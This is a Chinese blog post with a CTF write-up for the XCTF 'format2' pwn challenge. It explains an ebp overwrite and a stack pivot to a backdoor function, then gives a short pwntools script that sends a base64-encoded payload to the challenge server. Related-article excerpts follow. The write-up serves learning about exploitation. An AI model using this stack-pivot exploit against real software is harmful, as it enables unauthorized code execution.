format2 攻防世界

最新推荐文章于 2022-03-08 20:15:00 发布
最新推荐文章于 2022-03-08 20:15:00 发布
阅读量660 收藏
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/95986445
版权

这个题 确实很恶心

本来感觉应该是栈溢出 或者  直接验证   但是 md5 解不开 然后调试的时候逐渐发现问题

晕死,,

虽然长度那个变量是 无符号 但是  输入字符限定 30 我们也没有什么办法  来通过 这个来操作

然后进入check 函数

发现v4 可以  溢出修改ebp

并且这里有后门函数

ebp  ebp ebp    栈转移

 

两个  leave 和  retn  那么 就可以 通过输入的值 来修改ebp  input

先把ebp 转化成 input 的地址   然后 mov   esp ebp       esp 的值变成了 input 的地址

然后 在mov esp  ebp   pop ebp    ret (pop rip) 

这里  的 pop rip 就可以控制流程了

三行代码搞定,,,  等等  三行代码

#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import*
import base64
context(log_level = 'debug', arch = 'amd64' , os = 'linux')
system_addr=0x08049284
input_addr=0x0811EB40
flag=0
if flag:
	io  = process("./format2")
else:
	io  = remote("111.198.29.45",42949)
paload='a'*4+p32(system_addr)+p32(input_addr)
io.sendline(base64.b64encode(paload))
io.interactive()

 

pipixia233333
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界”pwn之format2
qq_42728977的博客
12-11 459
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
format2(xctf)
weixin_43868725的博客
09-02 578
0x0 程序保护和流程 保护: 流程: main() 接收一个最长为30的字符串,通过base64解密后长度小于12就会将解密后的字符串复制到input处,之后调用auth()。 在将input中的字符串复制到v4的时候存在四个字节的溢出。如果返回值为1的话就会进入correct()。 此时如果input==0xDEADBEEF的话就能够getshell了。 0x1 利用过程 1.虽然checksec提示说程序开启了canary但是在主要逻辑上的函数都没有开启canary,所以可以进行溢出。 2.因
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 414
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
攻防世界PWN之format2题解
seaaseesa的博客
11-10 688
format2(整数地址空间溢出) 本题需要细心 首先,检测一下程序保护机制 虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。 我们用IDA分析一下 后门函数 溢出点在这,memcpy传入的是v4的地址,而v4是int,最多也就8字节,因此这里可以溢出 程序的流程是将我们输入的字符串进行BASE6...
xctf format2
doudoudedi
10-01 293
日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦...
pwn 练习笔记 format2
SsMing的博客
08-16 297
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
buffer-format.rar_V2
09-21
**2. buffer format V2** 在`buffer-format.txt`中,可能会详细描述Linux内核v2.13.6中initramfs缓冲区格式的改进。新版本可能涉及以下方面: - **效率优化**:减少内存占用,加快读写速度,通过更高效的编码或压缩...
Load format internal.ppt
11-10
本文介绍如何产生符合LOAD utility要求的FORMAT INTERNAL格式的行数据.
ICOFormat64.zip
04-23
2. 找到你的Adobe Photoshop CS6 64位安装目录,通常是“C:\Program Files\Adobe\Adobe Photoshop CS6 (64 Bit)”。 3. 在该目录下找到并进入"Plug-ins"子文件夹。 4. 将解压得到的ICOFormat64.8bi文件复制或移动到...
JsonFormat java android
07-17
"JsonFormat"在这里指的是一款本地工具,用于帮助开发者更方便地对JSON数据进行格式化,使其更易读。 在Windows环境下,开发者经常需要处理来自服务器的JSON响应或者在代码中创建JSON字符串。"JsonFormat"这款工具...
clang-format.exe
01-27
代码格式化工具
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 1879
time_formatter
攻防世界Reverse进阶区-IgniteMe-writeup
y4ung
09-19 694
1. 介绍 本题是xctf攻防世界中Reverse的进阶区的题IgniteMe 题目来源: 高校网络信息安全运维挑战赛 2. 分析 $ file fac4d1290e604fdfacbbe06fd1a5ca39.exe fac4d1290e604fdfacbbe06fd1a5ca39.exe: PE32 executable (console) Intel 80386, for MS Windows C:\Users\hzy\Downloads>fac4d1290e604fdfacbbe06fd1
攻防世界(pwn)Noleak
PLpa的博客
03-03 1495
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 207
移栈 一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
ceph format2格式image
weixin_37871174的博客
05-05 1243
1、接上篇,这创建一个format 2格式的image $rbd create rbd/format2_image_1G –image-format=2 -s 1G2、显示image元数据信息:size,order,block_name_prefix,format,features,flag $rbd info rbd/format2_image_1G rbd image ‘format2_i
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3731
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4276
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
初步学习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 951
初步学习CTF格式化字符串漏洞(待更新) 文章目录初步学习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符串漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
String mime = format2
最新发布
06-28
在这个表达式`String mime = format2?`中,看起来像是Java代码的一部分,它使用了Java的三元运算符(ternary operator)。如果`format2`是一个布尔值(`true`或`false`),那么这个表达式会根据`format2`的值来设置`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值